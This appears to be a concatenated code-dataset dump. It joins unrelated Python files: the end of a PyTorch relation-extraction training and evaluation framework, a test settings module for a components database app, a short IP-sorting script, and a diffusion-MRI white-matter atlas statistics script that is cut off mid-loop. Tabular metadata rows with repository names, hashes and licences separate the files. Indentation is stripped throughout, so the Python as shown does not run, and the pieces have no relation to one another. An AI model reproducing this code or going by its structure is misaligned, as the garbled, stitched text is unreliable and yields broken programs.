ret.add(tuple((_h[0], _t[0])))
else:
ret.add(tuple((triple[0], triple[2])))
return ret
def _to_triple(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
# print("lang:{} A:{}".format(lang, triple))
        if lang == 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
# print("B:{}".format(triple))
if head_only:
_h = triple[0].split(" ")
_t = triple[2].split(" ")
ret.add(tuple((_h[0], triple[1], _t[0])))
else:
ret.add(tuple((triple[0], triple[1], triple[2])))
return ret
def _load_gold_data(data_gold, data_id, head_only=False, gold_type='EP', lang='ENGLISH'):
_tokens, _triples = data_gold[data_id]
if gold_type == 'EP':
gold_value = _to_ep(_triples, head_only, lang=lang)
elif gold_type == 'sub':
gold_value = _to_sub(_triples, head_only, lang=lang)
elif gold_type == 'obj':
gold_value = _to_obj(_triples, head_only, lang=lang)
elif gold_type == 'ALL':
gold_value = _to_triple(_triples, head_only, lang=lang)
return gold_value, _tokens
def _cal_prf(correct_num, predict_num, gold_num):
eval_p = correct_num / (predict_num + 1e-10)
eval_r = correct_num / (gold_num + 1e-10)
eval_f = 2 * eval_p * eval_r / (eval_p + eval_r + 1e-10)
return eval_p, eval_r, eval_f
class Framework(object):
def __init__(self, con, wandb_log):
self.config = con
self.wandb_log = wandb_log
def train(self, model_pattern):
# initialize the model
ori_model = model_pattern(self.config)
ori_model.cuda()
# define the optimizer
optimizer = optim.Adam(filter(lambda p: p.requires_grad, ori_model.parameters()), lr=self.config.learning_rate)
# whether use multi GPU
if self.config.multi_gpu:
model = nn.DataParallel(ori_model)
else:
model = ori_model
# define the loss function
def loss(gold, pred, mask):
pred = pred.squeeze(-1)
los = F.binary_cross_entropy(pred, gold, reduction='none')
if mask is None:
los = torch.sum(los)/self.config.rel_num
return los
if los.shape != mask.shape:
mask = mask.unsqueeze(-1)
los = torch.sum(los * mask) / torch.sum(mask)
return los
# check the checkpoint dir
if not os.path.exists(self.config.checkpoint_dir):
os.mkdir(self.config.checkpoint_dir)
# get the data loader
train_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.train_prefix, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
dev_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer,
prefix=self.config.test_prefix, is_test=True,
collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
model.train()
global_step = 0
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
best_f1_score = -1
best_test_f1 = 0
best_test_h_f1 = 0
best_epoch = 0
# the training loop
for epoch in range(self.config.max_epoch):
train_data_prefetcher = data_loader.DataPreFetcher(train_data_loader)
data = train_data_prefetcher.next()
while data is not None:
if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails, \
sim_sub_h2t, sim_sub_t2h, sim_obj_h2t, sim_obj_t2h, \
sim_sub_oh, sim_sub_ot, sim_obj_sh, sim_obj_st, pred_rels = model(data)
# entity boundary loss
loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])
loss_obj_heads = loss(data['em_obj_heads'], pred_obj_heads, mask=data['mask'])
loss_obj_tails = loss(data['em_obj_tails'], pred_obj_tails, mask=data['mask'])
# entity span loss
loss_sub_h2t = loss(data['sub_h2t'], sim_sub_h2t, mask=data['mask'])
loss_sub_t2h = loss(data['sub_t2h'], sim_sub_t2h, mask=data['mask'])
loss_obj_h2t = loss(data['obj_h2t'], sim_obj_h2t, mask=data['mask'])
loss_obj_t2h = loss(data['obj_t2h'], sim_obj_t2h, mask=data['mask'])
# entity pair loss
loss_sub2objh = loss(data['sub2obj_h'], sim_sub_oh, mask=data['mask'])
loss_sub2objt = loss(data['sub2obj_t'], sim_sub_ot, mask=data['mask'])
loss_obj2subh = loss(data['obj2sub_h'], sim_obj_sh, mask=data['mask'])
loss_obj2subt = loss(data['obj2sub_t'], sim_obj_st, mask=data['mask'])
# relation loss
loss_rel = loss(data['rel_labels'], pred_rels, mask=None)
ent_boundary_loss = loss_sub_heads + loss_sub_tails + loss_obj_heads + loss_obj_tails
ent_span_loss = loss_sub_h2t + loss_sub_t2h + loss_obj_h2t + loss_obj_t2h
ent_pair_loss = loss_sub2objh + loss_sub2objt + loss_obj2subh + loss_obj2subt
total_loss = ent_boundary_loss + ent_span_loss + ent_pair_loss + loss_rel
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
global_step += 1
loss_sum += total_loss.item()
ent_boundary_loss_sum += ent_boundary_loss.item()
ent_span_loss_sum += ent_span_loss.item()
ent_pair_loss_sum += ent_pair_loss.item()
rel_loss_sum += loss_rel.item()
if global_step % self.config.period == 0:
# print(loss_sum)
if self.wandb_log is not None:
self.wandb_log.log({"LOSS_SUM:": loss_sum})
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
data = train_data_prefetcher.next()
elif self.config.model_name == 'Casrel':
pred_sub_heads, pred_sub_tails, pred_s2ro_heads, pred_s2ro_tails = model(data)
# entity boundary loss
loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])
# relation loss
loss_s2ro_heads = loss(data['batch_s2ro_heads'], pred_s2ro_heads, mask=data['mask'])
loss_s2ro_tails = loss(data['batch_s2ro_tails'], pred_s2ro_tails, mask=data['mask'])
ent_boundary_loss = loss_sub_heads + loss_sub_tails
rel_loss = loss_s2ro_heads + loss_s2ro_tails
total_loss = ent_boundary_loss + rel_loss
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
global_step += 1
loss_sum += total_loss.item()
ent_boundary_loss_sum += ent_boundary_loss.item()
rel_loss_sum += rel_loss.item()
if global_step % self.config.period == 0:
if self.wandb_log is not None:
self.wandb_log.log({"LOSS_SUM:": loss_sum})
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
data = train_data_prefetcher.next()
if (epoch + 1) % self.config.test_epoch == 0:
model.eval()
# call the test function
dev_triple_p, dev_triple_r, dev_triple_f, dev_triple_hp, dev_triple_hr, dev_triple_hf, \
dev_ep_p, dev_ep_r, dev_ep_f, dev_ep_hp, dev_ep_hr, dev_ep_hf, \
dev_sub_p, dev_sub_r, dev_sub_f, dev_sub_hp, dev_sub_hr, dev_sub_hf, \
dev_obj_p, dev_obj_r, dev_obj_f, dev_obj_hp, dev_obj_hr, dev_obj_hf = self.test(dev_data_loader, self.config.step_dim, self.config.step_matrix, model)
test_triple_p, test_triple_r, test_triple_f, test_triple_hp, test_triple_hr, test_triple_hf, \
test_ep_p, test_ep_r, test_ep_f, test_ep_hp, test_ep_hr, test_ep_hf, \
test_sub_p, test_sub_r, test_sub_f, test_sub_hp, test_sub_hr, test_sub_hf, \
test_obj_p, test_obj_r, test_obj_f, test_obj_hp, test_obj_hr, test_obj_hf = self.test(test_data_loader,
self.config.step_dim,
self.config.step_matrix,
model)
model.train()
# eval_f1_score
if dev_triple_f > best_f1_score:
best_epoch = epoch
best_f1_score = dev_triple_f
best_test_h_f1 = test_triple_hf
best_test_f1 = test_triple_f
# save the best model
path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
if not self.config.debug:
torch.save(ori_model.state_dict(), path)
if self.wandb_log is not None:
self.wandb_log.log({
"BEST_EPOCH:": best_epoch,
"DEV_Triple_F1": dev_triple_f,
"DEV_TripleH_F1": dev_triple_hf,
"DEV_EP_F1": dev_ep_f,
"DEV_SUB_F1": dev_sub_f,
"DEV_OBJ_F1": dev_obj_f,
"DEV_EPH_F1": dev_ep_hf,
"DEV_SUBH_F1": dev_sub_hf,
"DEV_OBJH_F1": dev_obj_hf,
"best_test_h_f1": best_test_h_f1,
"best_test_f1": best_test_f1,
"current_epoch": epoch})
# manually release the unused cache
torch.cuda.empty_cache()
def cal_sub_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
_head_prob = pred_heads[0][head_idx][0].tolist()
_tail_prob = pred_tails[0][tail_idx][0].tolist()
_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_head_mapping[0][0][head_idx] = 1
_tail_mapping[0][0][tail_idx] = 1
_head_mapping = _head_mapping.to(encoded_txt)
_tail_mapping = _tail_mapping.to(encoded_txt)
sub_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)
# predict entity span
sim_ent_ht, sim_ent_th = model.sub_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
_h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
_t2h_prob = sim_ent_th[0][head_idx][0].tolist()
# span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob
# trans head idx
sim_ent_gh, sim_ent_gt = model.sub_entity_trans(sub_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()
return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob
def cal_obj_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
_head_prob = pred_heads[0][head_idx][0].tolist()
_tail_prob = pred_tails[0][tail_idx][0].tolist()
_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_head_mapping[0][0][head_idx] = 1
_tail_mapping[0][0][tail_idx] = 1
_head_mapping = _head_mapping.to(encoded_txt)
_tail_mapping = _tail_mapping.to(encoded_txt)
obj_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)
# predict entity span
sim_ent_ht, sim_ent_th = model.obj_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
_h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
_t2h_prob = sim_ent_th[0][head_idx][0].tolist()
# span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob
# trans head idx
sim_ent_gh, sim_ent_gt = model.obj_entity_trans(obj_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()
return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob
def cal_rel_prob(self, sub_head_idx, sub_tail_idx, obj_head_idx, obj_tail_idx, model, encoded_txt, rel_bar=0.5):
sub_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
sub_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
sub_head_mapping[0][0][sub_head_idx] = 1
sub_tail_mapping[0][0][sub_tail_idx] = 1
sub_head_mapping = sub_head_mapping.to(encoded_txt)
sub_tail_mapping = sub_tail_mapping.to(encoded_txt)
obj_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
obj_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
obj_head_mapping[0][0][obj_head_idx] = 1
obj_tail_mapping[0][0][obj_tail_idx] = 1
obj_head_mapping = obj_head_mapping.to(encoded_txt)
obj_tail_mapping = obj_tail_mapping.to(encoded_txt)
pred_rels = model.rel_classification(sub_head_mapping, sub_tail_mapping, obj_head_mapping, obj_tail_mapping, encoded_txt)
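        # Keep only the relation indices whose predicted probability exceeds rel_bar.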
pred_rels_idx = np.where(pred_rels.cpu()[0] > rel_bar)[0]
return pred_rels_idx
def _cal_ep_score(self, sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob):
_score = sub_span_prob*sub_trans_prob + obj_span_prob*obj_trans_prob
return _score
def test(self, x_data_loader, step_dim, step_matrix, model):
test_data_prefetcher = data_loader.DataPreFetcher(x_data_loader)
data = test_data_prefetcher.next()
pred_eps_id = list()
data_id = 0
data_gold = list()
id2rel = json.load(open(os.path.join(self.config.data_path, 'rel2id.json')))[0]
print(id2rel)
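        # Build per-token step features: row i of the result holds step_matrix[i - sample_idx + max_len].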
def make_step(sample_idx, text_len):
walk_step = np.zeros((text_len, step_dim))
for i in range(text_len):
walk_step[i] = step_matrix[i - sample_idx + self.config.max_len]
walk_step_t = torch.Tensor(walk_step)
walk_step_t = walk_step_t.unsqueeze(0)
walk_step_t = walk_step_t.to(torch.device('cuda'))
return walk_step_t
while data is not None:
with torch.no_grad():
token_ids = data['token_ids']
tokens = data['tokens'][0]
mask = data['mask']
gold_triples = data['triples'][0]
data_gold.append((tokens, gold_triples))
seq_len = len(tokens)
encoded_text = model.get_encoded_text(token_ids, mask)
if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails = model.pred_entity_boundary(encoded_text)
_bar = 0.1
max_span_len = 30
span_sub_heads = np.where(pred_sub_heads.cpu()[0] > _bar)[0]
span_sub_tails = np.where(pred_sub_tails.cpu()[0] > _bar)[0]
span_obj_heads = np.where(pred_obj_heads.cpu()[0] > _bar)[0]
span_obj_tails = np.where(pred_obj_tails.cpu()[0] > _bar)[0]
pred_eps = dict()
for _sub_head_idx in span_sub_heads:
for _sub_tail_idx in span_sub_tails:
for _obj_head_idx in span_obj_heads:
for _obj_tail_idx in span_obj_tails:
if _sub_head_idx <= _sub_tail_idx and _obj_head_idx <= _obj_tail_idx and (_sub_tail_idx - _sub_head_idx) < max_span_len and (_obj_tail_idx - _obj_head_idx) < max_span_len:
sub_head_walk_step = make_step(_sub_head_idx, seq_len)
sub_tail_walk_step = make_step(_sub_tail_idx, seq_len)
obj_head_walk_step = make_step(_obj_head_idx, seq_len)
obj_tail_walk_step = make_step(_obj_tail_idx, seq_len)
# cal span prob and trans prob
sub_head_prob, sub_h2t_prob, sub_tail_prob, sub_t2h_prob, sub_trans_head_prob, sub_trans_tail_prob = \
self.cal_sub_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, pred_sub_heads, pred_sub_tails, sub_head_walk_step, sub_tail_walk_step, model, encoded_text, seq_len)
obj_head_prob, obj_h2t_prob, obj_tail_prob, obj_t2h_prob, obj_trans_head_prob, obj_trans_tail_prob = \
self.cal_obj_prob(_obj_head_idx, _obj_tail_idx, _sub_head_idx, _sub_tail_idx, pred_obj_heads, pred_obj_tails, obj_head_walk_step, obj_tail_walk_step, model, encoded_text, seq_len)
sub_span_prob = sub_head_prob * sub_h2t_prob + sub_tail_prob * sub_t2h_prob
obj_span_prob = obj_head_prob * obj_h2t_prob + obj_tail_prob * obj_t2h_prob
sub_trans_prob = sub_trans_head_prob * sub_trans_tail_prob
obj_trans_prob = obj_trans_head_prob * obj_trans_tail_prob
ep_score = self._cal_ep_score(sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob)
if ep_score > 2.5:
pred_rels_idx = self.cal_rel_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, model, encoded_text)
for rel_idx in pred_rels_idx:
rel_idx = str(rel_idx)
if (_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx]) not in pred_eps:
pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
else:
if ep_score > pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])]:
pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
else:
ent_bar = 0.5
rel_bar = 0.5
pred_eps = dict()
pred_sub_heads, pred_sub_tails = model.get_subs(encoded_text)
sub_heads, sub_tails = np.where(pred_sub_heads.cpu()[0] > ent_bar)[0], \
np.where(pred_sub_tails.cpu()[0] > ent_bar)[0]
subjects = []
for sub_head in sub_heads:
sub_tail = sub_tails[sub_tails >= sub_head]
if len(sub_tail) > 0:
sub_tail = sub_tail[0]
subject = tokens[sub_head: sub_tail]
subjects.append((subject, sub_head, sub_tail))
if subjects:
triple_list = []
# [subject_num, seq_len, bert_dim]
repeated_encoded_text = encoded_text.repeat(len(subjects), 1, 1)
# [subject_num, 1, seq_len]
sub_head_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
sub_tail_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
for subject_idx, subject in enumerate(subjects):
sub_head_mapping[subject_idx][0][subject[1]] = 1
sub_tail_mapping[subject_idx][0][subject[2]] = 1
sub_tail_mapping = sub_tail_mapping.to(repeated_encoded_text)
sub_head_mapping = sub_head_mapping.to(repeated_encoded_text)
pred_obj_heads, pred_obj_tails = model.get_objs_for_specific_sub(sub_head_mapping,
sub_tail_mapping,
repeated_encoded_text)
for subject_idx, subject in enumerate(subjects):
obj_heads, obj_tails = np.where(pred_obj_heads.cpu()[subject_idx] > rel_bar), np.where(pred_obj_tails.cpu()[subject_idx] > rel_bar)
for obj_head, rel_head in zip(*obj_heads):
for obj_tail, rel_tail in zip(*obj_tails):
if obj_head <= obj_tail and rel_head == rel_tail:
ep_score = pred_obj_tails.cpu()[subject_idx][obj_head][rel_head].item()
rel_head = str(rel_head)
if (subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head]) not in pred_eps:
pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
else:
if ep_score > pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])]:
pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
break
for _ep in pred_eps:
pred_eps_id.append((_ep[0], _ep[1], _ep[2], _ep[3], pred_eps[_ep], data_id, _ep[4]))
data_id += 1
data = test_data_prefetcher.next()
pred_eps_id = sorted(pred_eps_id, key=lambda x: x[4], reverse=True)
def element_prf(pred_eps_id, data_gold, head_only=False, gold_type='EP', lang='ENGLISH'):
correct_num, pred_num, gold_num = 0, 0, 0
v_pred_entity_pair = set()
# To calculate gold number
for item in data_gold:
gold_triples = item[1]
if gold_type == 'EP':
gold_info = _to_ep(gold_triples, head_only, lang=lang)
elif gold_type == 'sub':
gold_info = _to_sub(gold_triples, head_only, lang=lang)
elif gold_type == 'obj':
gold_info = _to_obj(gold_triples, head_only, lang=lang)
elif gold_type == 'ALL':
gold_info = _to_triple(gold_triples, head_only, lang=lang)
# print(head_only, gold_info)
gold_num += len(gold_info)
# print("gold_type:{}, gold_num:{}".format(gold_type, gold_num))
for _eps_id in pred_eps_id:
gold_results, _tokens = _load_gold_data(data_gold, _eps_id[5], head_only, gold_type, lang=lang)
sub = _tokens[_eps_id[0]: _eps_id[1]+1]
sub = self.config.tokenizer.convert_tokens_to_string(sub)
                if lang == 'CHINESE':
sub = sub.replace(' ', '')
sub = sub.replace('$', ' ')
sub = sub.strip().replace(" - ", "-")
if head_only:
sub = sub.split(" ")[0]
obj = _tokens[_eps_id[2]: _eps_id[3]+1]
obj = self.config.tokenizer.convert_tokens_to_string(obj)
# obj = ''.join([i.lstrip("##") for i in obj])
#obj = ' '.join(obj.split('[unused1]'))
obj = obj.strip().replace(" - ", "-")
                if lang == 'CHINESE':
obj = obj.replace(' ', '')
obj = obj.replace('$', ' ')
if head_only:
obj = obj.split(" ")[0]
rel = _eps_id[6]
if gold_type == 'EP':
pred_info = (sub, obj, _eps_id[5])
elif gold_type == 'sub':
pred_info = (sub, _eps_id[5])
elif gold_type == 'obj':
pred_info = (obj, _eps_id[5])
elif gold_type == 'ALL':
pred_info = (sub, rel, obj, _eps_id[5])
if pred_info not in v_pred_entity_pair:
v_pred_entity_pair.add(pred_info)
else:
continue
if gold_type == 'EP':
pred_info = (sub, obj)
elif gold_type == 'sub':
pred_info = (sub)
elif gold_type == 'obj':
pred_info = (obj)
elif gold_type == 'ALL':
pred_info = (sub, rel, obj)
# print(head_only, pred_info)
if pred_info in gold_results:
correct_num += 1
#else:
# if gold_type == 'ALL' and head_only == False:
# print("pred_info:{}".format(pred_info))
# print("gold_results:{}".format(gold_results))
pred_num += 1
p, r, f = _cal_prf(correct_num, pred_num, gold_num)
print("gold_type:{} head_only:{} gold_num:{} pred_num:{} correct_num:{}, p:{},r:{},f:{},".format(gold_type, head_only, gold_num, pred_num, correct_num, p, r, f))
return p, r, f
# print(pred_eps_id)
triple_p, triple_r, triple_f = element_prf(pred_eps_id, data_gold, gold_type='ALL', lang=self.config.dataset_lang)
triple_hp, triple_hr, triple_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='ALL', lang=self.config.dataset_lang)
ep_p, ep_r, ep_f = element_prf(pred_eps_id, data_gold, gold_type='EP', lang=self.config.dataset_lang)
ep_hp, ep_hr, ep_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='EP', lang=self.config.dataset_lang)
sub_p, sub_r, sub_f = element_prf(pred_eps_id, data_gold, gold_type='sub', lang=self.config.dataset_lang)
sub_hp, sub_hr, sub_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='sub', lang=self.config.dataset_lang)
obj_p, obj_r, obj_f = element_prf(pred_eps_id, data_gold, gold_type='obj', lang=self.config.dataset_lang)
obj_hp, obj_hr, obj_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='obj', lang=self.config.dataset_lang)
return triple_p, triple_r, triple_f, triple_hp, triple_hr, triple_hf, \
ep_p, ep_r, ep_f, ep_hp, ep_hr, ep_hf, \
sub_p, sub_r, sub_f, sub_hp, sub_hr, sub_hf, \
obj_p, obj_r, obj_f, obj_hp, obj_hr, obj_hf
def testall(self, model_pattern):
model = model_pattern(self.config)
path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
model.load_state_dict(torch.load(path))
model.cuda()
model.eval()
test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
self.test(test_data_loader, self.config.step_dim, self.config.step_matrix, model)
return
| 48.786164 | 223 | 0.561718 | 28,090 | 0.905195 | 0 | 0 | 0 | 0 | 0 | 0 | 2,322 | 0.074826 |
f1c88d2448c823f942e8276b943c094ce146f49b
| 799 |
py
|
Python
|
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
"""
Settings for the application when run in the test suite.
"""
import os
import sys
# Add the directory containing this file to the search path
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# Import function to generate a self-signed cert dynamically
from x509cert import gen_self_signed_cert
DEBUG = True
TESTING = True
SECRET_KEY = 'bonjour, monde'
# Configure the testing database. The database URI is specified by the
# COMPONENTSDB_DATABASE_URI environment variable.
SQLALCHEMY_DATABASE_URI = os.environ.get(
'COMPONENTSDB_DATABASE_URI', 'sqlite://'
)
SQLALCHEMY_ECHO = True
_cert, _key = gen_self_signed_cert()
GOOGLE_OAUTH2_CERTS = {'selfsigned': _cert}
GOOGLE_OAUTH2_ALLOWED_CLIENT_IDS = ['my-client']
TESTING_GOOGLE_OAUTH2_CERT_PRIV_KEYS = {'selfsigned': _key}
| 26.633333 | 70 | 0.787234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 394 | 0.493116 |
f1c8a2ea1e6774516b221761cec538d39be7d6c1
| 254 |
py
|
Python
|
learn-python/sort_with_key.py
|
barissimsek/gopython
|
7e2c1bdb20b2a908c601794ea9dbf71ea035a869
|
[
"Apache-2.0"
] | null | null | null |
learn-python/sort_with_key.py
|
barissimsek/gopython
|
7e2c1bdb20b2a908c601794ea9dbf71ea035a869
|
[
"Apache-2.0"
] | null | null | null |
learn-python/sort_with_key.py
|
barissimsek/gopython
|
7e2c1bdb20b2a908c601794ea9dbf71ea035a869
|
[
"Apache-2.0"
] | null | null | null |
ips = [
'10.0.0.5',
'10.5.3.1',
'192.168.11.10',
'2.2.2.2',
'100.0.0.1',
'20.3.2.4'
]
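# Sort key: split the dotted address into numeric octets so ordering is numeric rather than lexicographic.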
def getKey(item):
return tuple(int(part) for part in item.split('.'))
def sort_ips(iplist):
    return sorted(iplist, key=getKey)
print(sort_ips(ips))
| 12.095238 | 52 | 0.566929 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 68 | 0.267717 |
f1c983b126df00c8a011720ca60d9fd2cfbf09df
| 5,330 |
py
|
Python
|
tbss_wm_atlas_stats.py
|
shanqing-cai/MRI_analysis
|
39b3d48e2158623ffd9a8a6ea47d16a4a7b83cd9
|
[
"BSD-4-Clause"
] | 1 |
2016-02-08T18:31:36.000Z
|
2016-02-08T18:31:36.000Z
|
tbss_wm_atlas_stats.py
|
shanqing-cai/MRI_analysis
|
39b3d48e2158623ffd9a8a6ea47d16a4a7b83cd9
|
[
"BSD-4-Clause"
] | null | null | null |
tbss_wm_atlas_stats.py
|
shanqing-cai/MRI_analysis
|
39b3d48e2158623ffd9a8a6ea47d16a4a7b83cd9
|
[
"BSD-4-Clause"
] | null | null | null |
#!/usr/bin/python
import os
import sys
import glob
import argparse
import tempfile
import numpy as np
from scipy.io import *
from scipy import stats
from subprocess import Popen, PIPE
from scai_utils import *
from get_qdec_info import get_qdec_info
from read_xml_labels import read_xml_labels
atlas_label_fn = \
"/usr/share/fsl/5.0/data/atlases/JHU/JHU-ICBM-labels-1mm.nii.gz"
atlas_label_xml = \
"/usr/share/fsl/5.0/data/atlases/JHU-labels.xml"
P_THRESH_UNC = 0.05
if __name__ == "__main__":
ap = argparse.ArgumentParser(description="Get stats (e.g., average FA) from in atlas-defined WM regions in TBSS-aligned diffusion-tensor images")
ap.add_argument("tbssDir", help="Base TBSS directory (e.g., /users/cais/STUT/analysis/dt_tbss_dtiprep2)")
if len(sys.argv) == 1:
ap.print_help()
sys.exit(0)
# === Parse input arguments === #
args = ap.parse_args()
tbssDir = args.tbssDir
# === Input sanity check === #
check_dir(tbssDir)
statsDir = os.path.join(tbssDir, "stats")
check_dir(statsDir)
origDir = os.path.join(tbssDir, "origdata")
check_dir(origDir)
check_file(atlas_label_fn)
# === Read JHU-ICBM labels === #
check_file(atlas_label_xml)
labs = read_xml_labels(atlas_label_xml)
# === Locate the all_FA image === #
allFA = os.path.join(statsDir, "all_FA.nii.gz")
check_file(allFA)
# === Find out the subject IDs and their groups === #
origDir = os.path.join(tbssDir, "origdata")
check_dir(origDir)
ds = glob.glob(os.path.join(origDir, "S??.nii.gz"))
ds.sort()
sIDs = []
idxPWS = []
idxPFS = []
for (i0, d) in enumerate(ds):
[tpath, tfn] = os.path.split(d)
sID = tfn.replace(".nii.gz", "")
sIDs.append(sID)
if get_qdec_info(sID, "diagnosis") == "PWS":
idxPWS.append(i0)
elif get_qdec_info(sID, "diagnosis") == "PFS":
idxPFS.append(i0)
else:
raise Exception, "Unrecognized diagnosis for subject %s: %s" % \
(sID, get_qdec_info(sID, "diagnosis"))
# === Split the all_FA image, for later use by fslstats === #
splitBase = tempfile.mktemp()
split_cmd = "fslsplit %s %s -t" % (allFA, splitBase)
saydo(split_cmd)
splitFNs = glob.glob(splitBase + "*.nii.gz")
splitFNs.sort()
if len(splitFNs) != len(sIDs):
raise Exception, "Number of volumes in 4D series %s (%d) does not match the number of subjects in origdata (%d)" % \
(allFA, len(splitFNs), len(sIDs))
# === Iterate through the WM labels and get the stats info === #
labRes = {"labels": [], "meanFA": [], "tt_t": [], "tt_p": []}
for (i0, lab) in enumerate(labs['name']):
ind = labs['ind'][i0]
if ind == 0:
continue
print("\nProcessing label #%d: %s\n" % (i0, lab))
labRes["labels"].append(lab)
labRes["meanFA"].append({"PWS": [], "PFS": []})
tmpfn = tempfile.mktemp() + ".nii.gz"
# == Binarize, get label mask == #
bin_cmd = "mri_binarize --i %s --match %d --o %s" % \
(atlas_label_fn, ind, tmpfn)
saydo(bin_cmd)
check_file(tmpfn)
# == Use fslstats to get the masked mean == #
t_vals = [-1] * len(sIDs)
for (i1, splitFN) in enumerate(splitFNs):
(sout, serr) = Popen(["fslstats", splitFN, "-k", tmpfn, "-m"], \
stdout=PIPE, stderr=PIPE).communicate()
if len(serr) > 0:
                raise Exception(
                    "ERROR occurred during fslstats on %s" % splitFN)
t_vals[i1] = float(sout.split(' ')[0])
t_vals = np.array(t_vals)
labRes["meanFA"][-1]["PWS"] = t_vals[idxPWS]
labRes["meanFA"][-1]["PFS"] = t_vals[idxPFS]
(t, p) = stats.ttest_ind(labRes["meanFA"][-1]["PWS"], \
labRes["meanFA"][-1]["PFS"])
labRes["tt_t"].append(t)
labRes["tt_p"].append(p)
os.system("rm -f %s" % tmpfn)
